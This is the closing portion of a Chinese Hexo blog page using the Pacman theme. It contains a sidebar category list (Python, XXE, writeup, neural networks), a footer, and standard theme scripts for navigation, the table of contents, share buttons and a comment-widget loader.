			<li><a href="/categories/专题-Python/" title="专题  Python">专题  Python<sup>0</sup></a></li>
		
			<li><a href="/categories/专题-XXE/" title="专题  XXE">专题  XXE<sup>0</sup></a></li>
		
			<li><a href="/categories/专题-writeup/" title="专题  writeup">专题  writeup<sup>1</sup></a></li>
		
			<li><a href="/categories/专题-可视神经网络/" title="专题  可视神经网络">专题  可视神经网络<sup>1</sup></a></li>
		
		</ul>
</div>


  

  <div class="rsspart">
	<a href="" target="_blank" title="rss">RSS</a>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	<div class="line">
		<span></span>
		<div class="author"></div>
	</div>
	
	
	<section class="info">
		<p> Hello <br/>
			似水流年</p>
	</section>
	 
	<div class="social-font clearfix">
		
		
		
		
		
	</div>
		<p class="copyright">Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/A-limon/pacman" target="_blank" title="Pacman">Pacman</a> © 2020 
		
		<a href="http://yoursite.com" target="_blank" title="Ycj">Ycj</a>
		
		</p>
</div>
</footer>
    <script src="/js/jquery-2.1.0.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else
    {
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
      
      $('#toc.toc-aside').css('display', 'none');
        
    }
  });
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      h  = $('article h2')
      ah = $('article h2'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  if(ah.length==0){
    t.css('display','none');
  }else{
    c.click(function(){
      ta.css('display', 'block').addClass('fadeIn');
    });
    o.click(function(){
      ta.css('display', 'none');
    });
    $(window).scroll(function(){
      ta.css("top",Math.max(140,320-$(this).scrollTop()));
    });
  };
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina');
  var html = [
  '<a href="#" class="overlay" id="qrcode"></a>',
  '<div class="qrcode clearfix"><span>扫描二维码分享到微信朋友圈</span><a class="qrclose" href="#share"></a><strong>Loading...Please wait</strong><img id="qrcode-pic" data-src="http://s.jiathis.com/qrcode.php?url=' + encodedUrl + '"/></div>',
  '<a href="#textlogo" class="article-back-to-top" title="Top"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="QRcode"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="Weibo"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);
  $('.article-share-qrcode').click(function(){
    var imgSrc = $('#qrcode-pic').attr('data-src');
    $('#qrcode-pic').attr('src', imgSrc);
    $('#qrcode-pic').load(function(){
        $('.qrcode strong').text(' ');
    });
  });
});     
</script>


<script type="text/javascript">
  var duoshuoQuery = {short_name:""};
  (function() {
    var ds = document.createElement('script');
    ds.type = 'text/javascript';ds.async = true;
    ds.src = '//static.duoshuo.com/embed.js';
    ds.charset = 'UTF-8';
    (document.getElementsByTagName('head')[0] 
    || document.getElementsByTagName('body')[0]).appendChild(ds);
  })();
</script> 





  </body>
</html>
